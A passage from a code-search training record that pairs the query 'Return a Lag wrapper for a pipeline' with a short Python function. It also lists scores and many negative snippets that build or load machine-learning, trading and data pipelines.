'_pipeline.joblib'\r\n\r\n if os.path.isfile(model_file):\r\n model = joblib.load(model_file)\r\n return model\r\n return None", "def load_torchtransformers(model_name):\n\n # There are two versions of huggingface, support both\n try:\n import pytorch_transformers\n except ModuleNotFoundError:\n import transformers as pytorch_transformers\n\n if model_name == \"bert\":\n tokenizer = pytorch_transformers.BertTokenizer.from_pretrained('bert-base-uncased')\n model = pytorch_transformers.BertModel.from_pretrained('bert-base-uncased', torchscript=True)\n input_data = torch.tensor([tokenizer.encode(text=\"Here is some text to encode\", add_special_tokens=True)])\n elif model_name == \"transformer_xl\":\n tokenizer = pytorch_transformers.TransfoXLTokenizer.from_pretrained('transfo-xl-wt103')\n model = pytorch_transformers.TransfoXLModel.from_pretrained('transfo-xl-wt103', torchscript=True)\n input_data = torch.tensor([tokenizer.encode(text=\"Here is some text to encode\", add_special_tokens=True)])\n else: \n raise ValueError(f'{model_name} is not supported. Unknown model name.')\n\n model = model.eval()\n return model, [input_data]", "def build_model(X_train, Y_train):\n #Choosing a straighforward single tree model to make training tractable in terms of time\n DTC = DecisionTreeClassifier(random_state = 11)\n\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(estimator=DTC))\n ])\n\n parameters = {'clf__estimator__criterion': [\"gini\", \"entropy\"],\n 'clf__estimator__splitter': [\"best\", \"random\"],\n 'clf__estimator__max_depth': randint(3, 6),\n 'clf__estimator__min_samples_split': randint(2,6)}\n\n grid_obj = RandomizedSearchCV(pipeline,parameters,n_iter=5, cv=5 )\n grid_obj.fit(X_train, Y_train)\n\n return grid_obj.best_estimator_", "def model_fn(model_dir):\n with open(os.path.join(model_dir, 'model.pkl'), 'rb') as pickle_file:\n model = pickle.load(pickle_file)\n return model", "def load_model(pickle_file):\n if os.path.isfile(pickle_file) == False:\n return None, None\n \n f = open(pickle_file, \"rb\")\n from_dump = pickle.load(f)\n f.close()\n\n return from_dump['clf'], from_dump['scaler']" ]
[ "0.6688918", "0.64640874", "0.64640874", "0.6416069", "0.6381701", "0.636211", "0.6302781", "0.62598276", "0.62242967", "0.6168712", "0.6149896", "0.6133813", "0.6130566", "0.61174124", "0.6096542", "0.6070486", "0.6065497", "0.60585046", "0.6046623", "0.6042597", "0.603112", "0.5973031", "0.59639597", "0.5930727", "0.5905255", "0.59017104", "0.5893399", "0.5892971", "0.58887047", "0.58774185", "0.5872599", "0.5860333", "0.58281684", "0.58121866", "0.57877827", "0.5759482", "0.5733511", "0.57274324", "0.5717768", "0.57125455", "0.5697244", "0.5694444", "0.56819874", "0.56735337", "0.5646899", "0.56397974", "0.5630489", "0.557741", "0.5562503", "0.5561034", "0.5556652", "0.5555347", "0.55481046", "0.5536343", "0.5531682", "0.5531682", "0.5531543", "0.5526589", "0.5526188", "0.5519003", "0.55118364", "0.5505841", "0.5495894", "0.5453491", "0.5421161", "0.53960806", "0.5377263", "0.5358144", "0.5350142", "0.53472346", "0.5335736", "0.53263307", "0.5295344", "0.5270819", "0.52694255", "0.5269299", "0.52686125", "0.5266199", "0.52576095", "0.5252173", "0.52518183", "0.5250244", "0.5247522", "0.5239901", "0.5236691", "0.5232623", "0.52287096", "0.5227189", "0.5224442", "0.5199644", "0.5193562", "0.5193485", "0.5172847", "0.516841", "0.51591456", "0.51503015", "0.51497704", "0.51467407", "0.51352936", "0.5134363" ]
0.771603
0
Return a Lag wrapper for a pipeline.
def get_lagger(pipe, kwargs): from .transforms import LagWrapper return LagWrapper(pipe, **kwargs)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pipeline(self) -> Pipeline:\n if self._to_pipeline is None:\n raise AttributeError(\n \"pipeline not available because `to_pipeline` was not set on __init__.\"\n )\n return self._to_pipeline(self)", "def get_pipeline(tag=None):\n\n\n data_science_pipeline = (\n # interdiction_baseline_call_pl()\n # + interdiction_baseline_parse_pl()\n #+ interdiction_community_pl()\n #+ interdiction_community_parse_pl()\n #+ dijkstra_prep_paths_pl()\n #+ dijkstra_parse_paths_pl()\n #+ dijkstra_reachable_pl()\n #+ dijkstra_shortest_paths_pl()\n + dijkstra_pypy_pickle_pl()\n + dijkstra_pypy_paths_pl()\n + dijkstra_make_adj_pl()\n #+ dijkstra_opt()\n + dijkstra_flow()\n + sds_counterfactual_pl()\n + supply_interdiction_pl()\n + post_supply_interdiction_pl()\n )\n \n if tag:\n if type(tag)==str:\n return Pipeline([n for n in data_science_pipeline.nodes if tag in n.tags])\n elif type(tag)==list:\n return Pipeline([n for n in data_science_pipeline.nodes if len(n.tags - set(tag)) < len(n.tags)])\n \n else:\n return data_science_pipeline", "def pipeline(args) :\n from pipeliner import create_pipeline\n create_pipeline(args)", "def pipeline(self, pipeline_id):\r\n return pipelines.Pipeline(self, pipeline_id)", "def pipeline(self):\n # gotta avoid circular imports by deferring\n from .pipeline import Pipeline\n return Pipeline().from_source(self._collection)", "def from_pipeline(cls, pipeline, proba=None, repeat=None):\n if proba is None:\n if repeat is None:\n new_p = cls(pipeline=pipeline)\n else:\n if pipeline.num_actions == 1 and pipeline.get_last_action_proba() is None:\n new_p = cls(pipeline=pipeline, repeat=repeat)\n else:\n new_p = cls()\n new_p.append_pipeline(pipeline, repeat=repeat)\n else:\n if pipeline.num_actions == 1 and pipeline.get_last_action_repeat() is None:\n new_p = cls(pipeline=pipeline, proba=proba)\n else:\n new_p = cls()\n new_p.append_pipeline(pipeline, proba=proba)\n return new_p", "def set_pipeline(self):\n pipe_distance = make_pipeline(DistanceTransformer(), RobustScaler())\n pipe_time = make_pipeline(TimeFeaturesEncoder(time_column='pickup_datetime'), OneHotEncoder(handle_unknown='ignore'))\n dist_cols = ['pickup_latitude', 'pickup_longitude', 'dropoff_latitude', 'dropoff_longitude']\n time_cols = ['pickup_datetime']\n feat_eng_bloc = ColumnTransformer([('time', pipe_time, time_cols),\n ('distance', pipe_distance, dist_cols)]\n )\n self.pipeline = Pipeline(steps=[('feat_eng_bloc', feat_eng_bloc),\n ('regressor', RandomForestRegressor())])\n return self.pipeline", "def pipeline():\n\n test_pipeline = (Pipeline()\n .init_variable('current_loss')\n .init_model('model', C('model_class'),\n 'dynamic', C('model_config'))\n .to_array(dtype='float32')\n .train_model('model',\n inputs=B('images'),\n targets=B('labels'),\n outputs='loss',\n save_to=V('current_loss'))\n )\n return test_pipeline", "def create_pipeline(self, train: LAMLDataset) -> LAMLTransformer:\n raise NotImplementedError", "def pipelines(self):\r\n return pipelines.Pipelines(self)", "def get_pipeline(self):\n if hasattr(self, \"pipeline\"):\n return self.pipeline\n steps = [\n # before preprocessor, comes the feature extractor\n ('extractor', TurkishFeatureExtractor()),\n # first the pre-processor\n (\"preprocessor\", TurkishPreprocessor(self.stemmer_name_to_method[self.stemmer_method])),\n (\"vectorizer\", TurkishVectorizer(self.feature_name_to_class[self.feature])),\n # use pca\n # (\"pca\", TruncatedSVD(n_components=20, n_iter=10)),\n (\"adder\", TurkishFeatureAdder(n_components=20, n_iter=10)),\n (\"model\", self.model_name_to_class[self.model])\n ]\n self.pipeline = Pipeline(steps)\n return self.pipeline", "def process_pipeline(frame, keep_state=True):\n\n global line_lt, line_rt, processed_frames\n\n # undistort the image using coefficients found in calibration\n undistorted_img = undistort(frame, mtx, dist)\n\n # binarize the frame and highlight lane lines\n binarized_img = binarize(undistorted_img)\n\n # perspective transform to obtain bird's eye view\n birdeye_img, matrix, inversed_matrix = birdeye(binarized_img, visualise=False)\n\n # 2 order polynomial curve fit onto lane lines found\n if processed_frames > 0 and keep_state and line_lt.detected and line_rt.detected:\n find_lane_by_previous_fits(birdeye_img, line_lt, line_rt, visualise=False)\n else:\n find_lane_by_sliding_windows(birdeye_img, line_lt, line_rt, n_windows=9, visualise=False)\n\n # compute offset in meter from center of the lane\n offset_meter = offset_from_lane_center(line_lt, line_rt, frame_width=frame.shape[1])\n\n # draw the surface enclosed by lane lines back onto the original frame\n blend_on_road = draw_back_onto_the_road(undistorted_img, inversed_matrix, line_lt, line_rt, keep_state)\n mean_curvature_meter = np.mean([line_lt.curvature_meter, line_rt.curvature_meter])\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(blend_on_road, 'Curvature radius: {:.02f}m'.format(mean_curvature_meter), (60, 60), font, 1,\n (255, 255, 255), 2)\n cv2.putText(blend_on_road, 'Offset from center: {:.02f}m'.format(offset_meter), (60, 90), font, 1,\n (255, 255, 255), 2)\n\n processed_frames += 1\n\n return blend_on_road", "def construct(args,\n **kwargs):\n kw = parse_args(args)\n kw.update(kwargs)\n return (build_pipeline(**kw),\n kw)", "def make_pipeline():\r\n\r\n # Custom universe containing only desired assets (stocks with flag data)\r\n universe = StaticSids(my_stocks)\r\n\r\n return Pipeline(\r\n columns={\r\n #'flag_type': algo_data_full.flag_type.latest,\r\n #'flag_price': algo_data_full.flag_price.latest,\r\n #'end_flag_date': algo_data_full.end_flag_date.latest,\r\n #'end_flag_price': algo_data_full.end_flag_price.latest,\r\n 'up_flags': flag_counts.up.latest,\r\n 'down_flags': flag_counts.down.latest,\r\n 'up_ratio': up_ratios_2.up_ratio.latest,\r\n 'close': USEquityPricing.close.latest,\r\n },\r\n screen=universe\r\n )", "def make_pipeline():\n \n # Base universe set to the QTradableStocksUS\n base_universe = QTradableStocksUS()#Q500US()\n base_universe = (base_universe & Q500US())\n base_universe = (base_universe & Fundamentals.market_cap.latest.top(150))\n \n # Factor of yesterday's close price.\n #yesterday_close = USEquityPricing.close.latest\n \n pipe = Pipeline(\n columns={\n #'close': yesterday_close,\n 'sector': Sector(),\n },\n screen=base_universe\n )\n return pipe", "def pipeline(self):\n return self._pipeline", "def pipeline(self):\n return self._pipeline", "def create_fake_pipeline(*_args, **_kwargs):\n return Pipeline(\n [\n node(match.clean_match_data, \"fake_match_data\", \"clean_match_data\"),\n node(\n common.convert_match_rows_to_teammatch_rows,\n \"clean_match_data\",\n \"match_data_b\",\n ),\n node(match.add_out_of_state, \"match_data_b\", \"match_data_c\"),\n node(match.add_travel_distance, \"match_data_c\", \"match_data_d\"),\n node(match.add_result, \"match_data_d\", \"match_data_e\"),\n node(match.add_margin, \"match_data_e\", \"match_data_f\"),\n node(\n match.add_shifted_team_features(\n shift_columns=[\n \"score\",\n \"oppo_score\",\n \"result\",\n \"margin\",\n \"team_goals\",\n \"team_behinds\",\n ]\n ),\n \"match_data_f\",\n \"match_data_g\",\n ),\n node(match.add_cum_win_points, \"match_data_g\", \"match_data_h\"),\n node(match.add_win_streak, \"match_data_h\", \"match_data_i\"),\n ]\n )", "def make_pipeline():\n universe = TradableStocksUS('Real Estate') | TradableStocksUS('Utilities') | \\\n TradableStocksUS('Consumer Staples') | TradableStocksUS('Technology') | \\\n TradableStocksUS('Financials') | TradableStocksUS('Energy') | \\\n TradableStocksUS('Materials') | TradableStocksUS('Health Care') | \\\n TradableStocksUS('Industrials') | TradableStocksUS('Consumer Discretionary') | \\\n TradableStocksUS('Communications')\n\n roic = shfd.slice(dimension='MRT', period_offset=0).ROIC.latest\n ebit = shfd.slice(dimension='MRQ', period_offset=0).EBIT.latest\n ev = shfd.slice(dimension='MRQ', period_offset=0).EV.latest\n volatility = AnnualizedVolatility(window_length=100)\n value = ebit / ev\n\n roic_rank = roic.rank(mask=universe)\n value_rank = value.rank(mask=universe)\n volatility_rank = volatility.rank(mask=universe, ascending=False)\n\n spy_ma100_price = SMA(inputs=[USEquityPricing.close], \n window_length=100)[algo.sid(\"FIBBG000BDTBL9\")]\n spy_price = USEquityPricing.close.latest[algo.sid(\"FIBBG000BDTBL9\")]\n\n momentum_score = MomentumScore()\n\n overall_rank = roic_rank + value_rank + volatility_rank\n\n # seven_month_returns = Returns(window_length=148, mask=universe,)\n # one_month_returns = Returns(window_length=30, mask=universe,)\n\n pipeline = Pipeline(\n columns={\n 'stock' : master.SecuritiesMaster.Symbol.latest,\n 'sid': master.SecuritiesMaster.Sid.latest,\n 'sector' : master.SecuritiesMaster.usstock_Sector.latest,\n 'average_dollar_volume': AverageDollarVolume(window_length=200),\n 'price': EquityPricing.close.latest,\n 'volume': EquityPricing.volume.latest,\n 'roic' : roic,\n 'value' : value,\n 'volatility': volatility,\n 'roic_rank' : roic_rank,\n 'value_rank' : value_rank,\n 'momentum': momentum_score,\n 'momentum_decile': momentum_score.deciles(),\n 'volatility_decile' : volatility.deciles(),\n 'overall_rank' : overall_rank,\n 'overall_rank_decile': overall_rank.deciles(),\n 'trend_filter': spy_price > spy_ma100_price,\n # 'returns' : one_month_returns - seven_month_returns\n }, \n screen = universe\n )\n\n return pipeline", "def pipeline(\n self,\n name: str,\n description: Optional[str] = None,\n labels: Optional[Sequence[PipelineLabel]] = None,\n ) -> \"Directory\":\n _args = [\n Arg(\"name\", name),\n Arg(\"description\", description, None),\n Arg(\"labels\", labels, None),\n ]\n _ctx = self._select(\"pipeline\", _args)\n return Directory(_ctx)", "def _create_pipeline(self) -> codepipeline.Pipeline:\n source_output = codepipeline.Artifact()\n build_output = codepipeline.Artifact()\n return codepipeline.Pipeline(\n self,\n 'Pipeline',\n stages=[\n self._create_source_stage('Source', source_output),\n # self._create_image_build_stage(\n # 'Build', source_output, build_output),\n # self._create_deploy_stage('Deploy', build_output)\n ]\n )", "def pipelines(self):\n return PipelineManager(session=self._session)", "def pipeline(ctx):\n asyncio.run(pipeline_impl(ctx.obj[\"config\"]))", "def get_pipeline_driver(module_name, passed_args=None):\n _imports = __import__(module_name, fromlist=[\"get_pipeline\"])\n kwargs = convert_struct(passed_args)\n return _imports.get_pipeline(**kwargs)", "def pipeline(\n self,\n name: str,\n description: Optional[str] = None,\n labels: Optional[Sequence[PipelineLabel]] = None,\n ) -> \"Container\":\n _args = [\n Arg(\"name\", name),\n Arg(\"description\", description, None),\n Arg(\"labels\", labels, None),\n ]\n _ctx = self._select(\"pipeline\", _args)\n return Container(_ctx)", "def get_refinement_pipeline():\n node_scaling = PrimaryNode('scaling')\n node_logit = SecondaryNode('logit', nodes_from=[node_scaling])\n node_decompose = SecondaryNode('class_decompose', nodes_from=[node_logit, node_scaling])\n node_rfr = SecondaryNode('rfr', nodes_from=[node_decompose])\n node_xgboost = SecondaryNode('xgboost', nodes_from=[node_rfr, node_logit])\n\n pipeline = Pipeline(node_xgboost)\n return pipeline", "def set_pipeline(self):\n dist_pipe = Pipeline([\n ('dist_trans', DistanceTransformer()),\n ('stdscaler', StandardScaler())\n ])\n\n time_pipe = Pipeline([\n ('time_enc', TimeFeaturesEncoder('pickup_datetime')),\n ('ohe', OneHotEncoder(handle_unknown='ignore'))\n ])\n\n preproc_pipe = ColumnTransformer([\n ('distance', dist_pipe, [\"pickup_latitude\", \"pickup_longitude\", 'dropoff_latitude', 'dropoff_longitude']),\n ('time', time_pipe, ['pickup_datetime'])\n ], remainder=\"drop\")\n\n pipe = Pipeline([\n ('preproc', preproc_pipe),\n ('linear_model', LinearRegression())\n ])\n return pipe", "def make_pipeline(slam, settings):\n\n pipeline_name = \"pipeline_source[inversion]\"\n\n \"\"\"\n This pipeline is tagged according to whether:\n\n 1) Hyper-fitting settings (galaxies, sky, background noise) are used.\n 2) The lens galaxy mass model includes an `ExternalShear`.\n 3) The `Pixelization` and `Regularization` scheme of the pipeline (fitted in phases 3 & 4).\n \"\"\"\n\n path_prefix = f\"{slam.path_prefix}/{pipeline_name}/{slam.source_inversion_tag}\"\n\n \"\"\"\n Phase 1: Fit the `Pixelization` and `Regularization`, where we:\n\n 1) Fix the lens mass model to the `MassProfile`'s inferred by the previous pipeline.\n \"\"\"\n\n phase1 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[1]_mass[fixed]_source[inversion_magnification_initialization]\",\n n_live_points=30,\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=af.last.instance.galaxies.lens.mass,\n shear=af.last.instance.galaxies.lens.shear,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.lens.hyper_galaxy,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=al.pix.VoronoiMagnification,\n regularization=al.reg.Constant,\n hyper_galaxy=af.last.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=af.last.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=af.last.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase1 = phase1.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 2: Fit the lens`s mass and source galaxy using the magnification `Inversion`, where we:\n\n 1) Fix the source `Inversion` parameters to the results of phase 1.\n 2) Set priors on the lens galaxy `MassProfile`'s using the results of the previous pipeline.\n \"\"\"\n\n phase2 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[2]_mass[total]_source[fixed]\", n_live_points=50\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=af.last[-1].model.galaxies.lens.mass,\n shear=af.last[-1].model.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=phase1.result.instance.galaxies.source.pixelization,\n regularization=phase1.result.instance.galaxies.source.regularization,\n hyper_galaxy=phase1.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase1.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase1.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase2 = phase2.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 3: fit the input pipeline `Pixelization` & `Regularization`, where we:\n\n 1) Fix the lens `MassProfile` to the result of phase 2.\n \"\"\"\n\n phase3 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[3]_mass[fixed]_source[inversion_initialization]\",\n n_live_points=30,\n evidence_tolerance=slam.setup_hyper.evidence_tolerance,\n sample=\"rstagger\",\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=phase2.result.instance.galaxies.lens.mass,\n shear=phase2.result.instance.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=slam.pipeline_source_inversion.setup_source.pixelization_prior_model,\n regularization=slam.pipeline_source_inversion.setup_source.regularization_prior_model,\n hyper_galaxy=phase2.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase2.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase2.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase3 = phase3.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=False\n )\n\n \"\"\"\n Phase 4: fit the lens`s mass using the input pipeline `Pixelization` & `Regularization`, where we:\n\n 1) Fix the source `Inversion` parameters to the results of phase 3.\n 2) Set priors on the lens galaxy `MassProfile`'s using the results of phase 2.\n \"\"\"\n\n mass = slam.pipeline_source_parametric.setup_mass.mass_prior_model_with_updated_priors(\n index=-1, unfix_mass_centre=True\n )\n\n phase4 = al.PhaseImaging(\n search=af.DynestyStatic(\n name=\"phase[4]_mass[total]_source[fixed]\", n_live_points=50\n ),\n galaxies=dict(\n lens=al.GalaxyModel(\n redshift=slam.redshift_lens,\n mass=mass,\n shear=phase2.result.model.galaxies.lens.shear,\n ),\n source=al.GalaxyModel(\n redshift=slam.redshift_source,\n pixelization=phase3.result.instance.galaxies.source.pixelization,\n regularization=phase3.result.instance.galaxies.source.regularization,\n hyper_galaxy=phase3.result.hyper_combined.instance.optional.galaxies.source.hyper_galaxy,\n ),\n ),\n hyper_image_sky=phase3.result.hyper_combined.instance.optional.hyper_image_sky,\n hyper_background_noise=phase3.result.hyper_combined.instance.optional.hyper_background_noise,\n settings=settings,\n )\n\n phase4 = phase4.extend_with_multiple_hyper_phases(\n setup_hyper=slam.setup_hyper, include_inversion=True\n )\n\n return al.PipelineDataset(\n pipeline_name, path_prefix, phase1, phase2, phase3, phase4\n )", "def create_pipeline(path):\n\n pipeline = import_file(path)\n # Perform Wigner-Seitz analysis:\n ws = WignerSeitzAnalysisModifier(\n output_displaced=False, # Output sites\n per_type_occupancies=True, # Output occupancies per atom type\n affine_mapping=ReferenceConfigurationModifier.AffineMapping.ToReference)\n pipeline.modifiers.append(ws)\n # Calculate total and elementwise occupancies\n pipeline.modifiers.append(total_occupancy_modifier)\n # Select all defect sites\n pipeline.modifiers.append(select_defects_modifier)\n # Delete all non-defect sites\n pipeline.modifiers.append(InvertSelectionModifier())\n pipeline.modifiers.append(DeleteSelectedModifier())\n # Find defect clusters\n pipeline.modifiers.append(ClusterAnalysisModifier(\n cutoff=CLUSTER_CUTOFF,\n sort_by_size=False))\n # Classify defect clusters\n pipeline.modifiers.append(classify_defect_clusters_modifier)\n\n return pipeline", "def get_loading_pipeline(pipeline):\n loading_pipeline = []\n for transform in pipeline:\n is_loading = is_loading_function(transform)\n if is_loading is None: # MultiScaleFlipAug3D\n # extract its inner pipeline\n if isinstance(transform, dict):\n inner_pipeline = transform.get('transforms', [])\n else:\n inner_pipeline = transform.transforms.transforms\n loading_pipeline.extend(get_loading_pipeline(inner_pipeline))\n elif is_loading:\n loading_pipeline.append(transform)\n assert len(loading_pipeline) > 0, \\\n 'The data pipeline in your config file must include ' \\\n 'loading step.'\n return loading_pipeline", "def run(self, pipeline: pipeline_pb2.Pipeline) -> Optional[Any]:\n pass", "def _make_pipeline(preprocessors, classifier):\n if isinstance(preprocessors, list):\n # support only preprocessing of lenght 2\n return make_pipeline(preprocessors[0], preprocessors[1], classifier)\n if preprocessors is None:\n return make_pipeline(classifier)\n\n return make_pipeline(preprocessors, classifier)", "def _init_pipeline(self, cfg: ConfigType) -> Callable:", "def pipeline(\n self,\n name: str,\n description: Optional[str] = None,\n labels: Optional[Sequence[PipelineLabel]] = None,\n ) -> \"Client\":\n _args = [\n Arg(\"name\", name),\n Arg(\"description\", description, None),\n Arg(\"labels\", labels, None),\n ]\n _ctx = self._select(\"pipeline\", _args)\n return Client(_ctx)", "def make_pipeline(steps):\n def compose2(f, g):\n return lambda x: g(f(x))\n return functools.reduce(compose2, steps)", "def run(self):\n pipeline = set_pipeline()\n pipeline.fit(self.X_train, self.y_train)\n return pipeline", "def delay_pipeline(pipeline, pipe):\n _pipeline = delayed(pipeline[0].curry())(pipe)\n for task in pipeline[1:]:\n _pipeline = delayed(task.curry())(_pipeline)\n\n return _pipeline", "def load_pipeline(name):\n pipeline = _load(name, get_pipelines_paths())\n if not pipeline:\n raise ValueError(\"Unknown pipeline: {}\".format(name))\n\n return pipeline", "def pipelines(self) -> list:\n if not self._pipelines:\n if \"pipelines\" not in self._pipeline_definition:\n raise ValueError(\"Pipeline is missing 'pipelines' field.\")\n elif len(self._pipeline_definition[\"pipelines\"]) == 0:\n raise ValueError(\"Pipeline has zero length 'pipelines' field.\")\n\n pipelines: list = list()\n for pipeline in self._pipeline_definition[\"pipelines\"]:\n pipelines.append(Pipeline(pipeline))\n\n self._pipelines = pipelines\n\n return self._pipelines", "def append(self, pipeline):\n for stage in pipeline.pipe:\n self._pipe.append(stage)\n return self", "def get_pipeline(self, y, n_quantiles=None):\n\n if n_quantiles is None:\n n_quantiles = _n_samples(y)\n\n self.pipe = _make_pipeline(estimator=self._regressor,\n transform=self.pipeline_transform,\n n_targets=_n_targets(y),\n random_state=self.random_state,\n verbose=self.verbose,\n n_jobs=self.n_jobs,\n cv=self.cv,\n memory=self.pipeline_memory,\n n_quantiles=n_quantiles,\n chain_order=self.chain_order,\n n_estimators=self.n_regressors,\n target_index=self.target_index,\n boosting_loss=self.boosting_loss,\n regularization=self.line_search_regularization,\n line_search_options=self.line_search_options)", "def create_pipeline(self, primitives, hyperparameters=None):\n\n self.primitive = self.check_path(primitives)\n\n if hyperparameters is not None:\n hyperparameters = self.check_path_hyperparameters(hyperparameters)\n pipeline = MLPipeline(self.primitive, hyperparameters)\n else:\n pipeline = MLPipeline(self.primitive)\n return pipeline", "def _pipeline(self):\n try:\n b = self._pipeline_cache\n except AttributeError:\n r = open_redis_connection()\n b = self._pipeline_cache = r.pipeline()\n return b", "def create_pipeline(clf):\n return Pipeline([('scaler', MinMaxScaler()), ('clf', clf)])", "def make_process_pipelines(\n self, dataset, return_epochs=False, return_raws=False, postprocess_pipeline=None\n ):\n if return_epochs and return_raws:\n message = \"Select only return_epochs or return_raws, not both\"\n raise ValueError(message)\n\n self.prepare_process(dataset)\n\n raw_pipelines = self._get_raw_pipelines()\n epochs_pipeline = self._get_epochs_pipeline(return_epochs, return_raws, dataset)\n array_pipeline = self._get_array_pipeline(\n return_epochs, return_raws, dataset, postprocess_pipeline\n )\n\n if array_pipeline is not None:\n events_pipeline = (\n self._get_events_pipeline(dataset) if return_raws else EpochsToEvents()\n )\n else:\n events_pipeline = None\n\n if events_pipeline is None and array_pipeline is not None:\n log.warning(\n f\"event_id not specified, using all the dataset's \"\n f\"events to generate labels: {dataset.event_id}\"\n )\n events_pipeline = (\n RawToEvents(dataset.event_id)\n if epochs_pipeline is None\n else EpochsToEvents()\n )\n\n process_pipelines = []\n for raw_pipeline in raw_pipelines:\n steps = []\n steps.append((StepType.RAW, SetRawAnnotations(dataset.event_id)))\n if raw_pipeline is not None:\n steps.append((StepType.RAW, raw_pipeline))\n if epochs_pipeline is not None:\n steps.append((StepType.EPOCHS, epochs_pipeline))\n if array_pipeline is not None:\n array_events_pipeline = ForkPipelines(\n [\n (\"X\", array_pipeline),\n (\"events\", events_pipeline),\n ]\n )\n steps.append((StepType.ARRAY, array_events_pipeline))\n process_pipelines.append(Pipeline(steps))\n return process_pipelines", "def spacy_pipeline() -> spacy.language.Language:\n context = get_spacy_pipeline()\n assert context is not None\n return context", "def _add_stage(self, name):\n def stage_func(self, *args, **kwargs):\n \"\"\" Stage function.\n\n :param args: Positional arguments.\n :param kwargs: Keyword arguments.\n :return: Pipeline (for method chaining).\n \"\"\"\n self._pipe.append(Stage(name, args, kwargs))\n return self\n\n setattr(Pipeline, name, stage_func)", "def make_pipeline(model):\n\n steps = [\n (\"imp\", SimpleImputer(strategy=\"most_frequent\")),\n (\"norm\", MinMaxScaler()),\n (\"reg\", model)\n ]\n pipeline = Pipeline(steps=steps)\n\n return pipeline", "async def get_pipeline(self, _id):\n return media.MediaPipeline(self, id=_id)", "def make_pipeline(context):\n \n # Base universe of top 500 US stocks.\n base_universe_filter = Q500US()\n\n # Stocks of only tech sector.\n tech_sector = Sector(mask=base_universe_filter)\n tech_universe_filter = base_universe_filter & tech_sector.eq(311)\n\n # Top 10 tech stocks with largest market cap.\n mkt_cap_filter = morningstar.valuation.market_cap.latest\n top_mkt_cap_tech_filter = mkt_cap_filter.top(context.NUM_SYMBOLS, mask=tech_universe_filter)\n\n # Bollinger band factor with Stdev factor 2.\n lower_band_factor, middle_factor, upper_band_factor = BollingerBands(window_length=22, k=2, mask=top_mkt_cap_tech_filter)\n\n # Percent difference between (price, lower_band) and (price, upper_band).\n price = USEquityPricing.close.latest\n buy_percent_factor = ((lower_band_factor - price)*100)/price\n sell_percent_factor = ((price - upper_band_factor)*100)/price\n\n # Mean reversion buy and sell filters.\n # Sell when price exceeds upper-band and buy when price is below lower-band.\n buy_filter = buy_percent_factor > 0\n sell_filter = sell_percent_factor > 0\n\n # Build and return the Pipeline.\n pipe_bbands = Pipeline(columns={'buy_percent': buy_percent_factor,\n 'lower_band': lower_band_factor,\n 'buy': buy_filter,\n 'price': price,\n 'sell': sell_filter,\n 'upper_band': upper_band_factor,\n 'sell_percent': sell_percent_factor}, screen=top_mkt_cap_tech_filter)\n \n return pipe_bbands", "def get_pipeline_definition(self, pipeline_id) -> Any:\n if \"pipelines\" in self._pipeline_definition:\n for pipeline in self._pipeline_definition[\"pipelines\"]:\n if pipeline[\"id\"] == pipeline_id:\n return Pipeline(pipeline)\n\n return None", "def pipe(*args, **kwargs):\n return parser(*args, **kwargs)", "def run(cls, pipeline, monitor=True, verbose=False):\n\n pipe = cls(pipeline, monitor=monitor, verbose=verbose)\n pipe._main()", "def process(obj, rv, logfile, verbose):\n _end_branch(obj)\n\n logger.info('creating pipeline...')\n stdin = click.get_text_stream('stdin')\n stdout = click.get_text_stream('stdout')\n\n def write(item):\n stdout.write(str(item))\n stdout.write('\\n')\n\n pl = pipeline.create(obj['pipeline'], output=write)\n\n logger.info('processing...')\n logger.info('----------------------------------------')\n try:\n pl.run(stdin)\n except Exception as e:\n logger.error(f'abort: {type(e).__name__}: {e}')\n raise click.Abort from e\n logger.info('----------------------------------------')\n logger.info('DONE.')", "def make_pipeline():\n # exchange = Fundamentals.exchange_id.latest\n # nyse_filter = exchange.eq('NYS')\n symbol_filter = StaticSids([TRADING_SID])\n set_benchmark(TRADING_SID) \n # volume_filter = VolumeFilter(\n # inputs=[USEquityPricing.volume],\n # window_length=1,\n # mask=symbol_filter\n # )\n\n # is_setup = volume_filter & alpha_long_weekly & alpha_long_daily\n weekly_high = WeeklyHigh(\n inputs=[USEquityPricing.high],\n mask=symbol_filter\n )\n weekly_low = WeeklyLow(\n inputs=[USEquityPricing.low],\n mask=symbol_filter\n )\n weekly_classifier = WeeklyClassifier(\n inputs=[\n USEquityPricing.open,\n USEquityPricing.high,\n USEquityPricing.low,\n USEquityPricing.close\n ],\n mask=symbol_filter\n )\n daily_classifier = DailyClassifier(\n inputs=[\n USEquityPricing.open,\n USEquityPricing.high,\n USEquityPricing.low,\n USEquityPricing.close\n ],\n mask=symbol_filter\n\n )\n\n pipe = 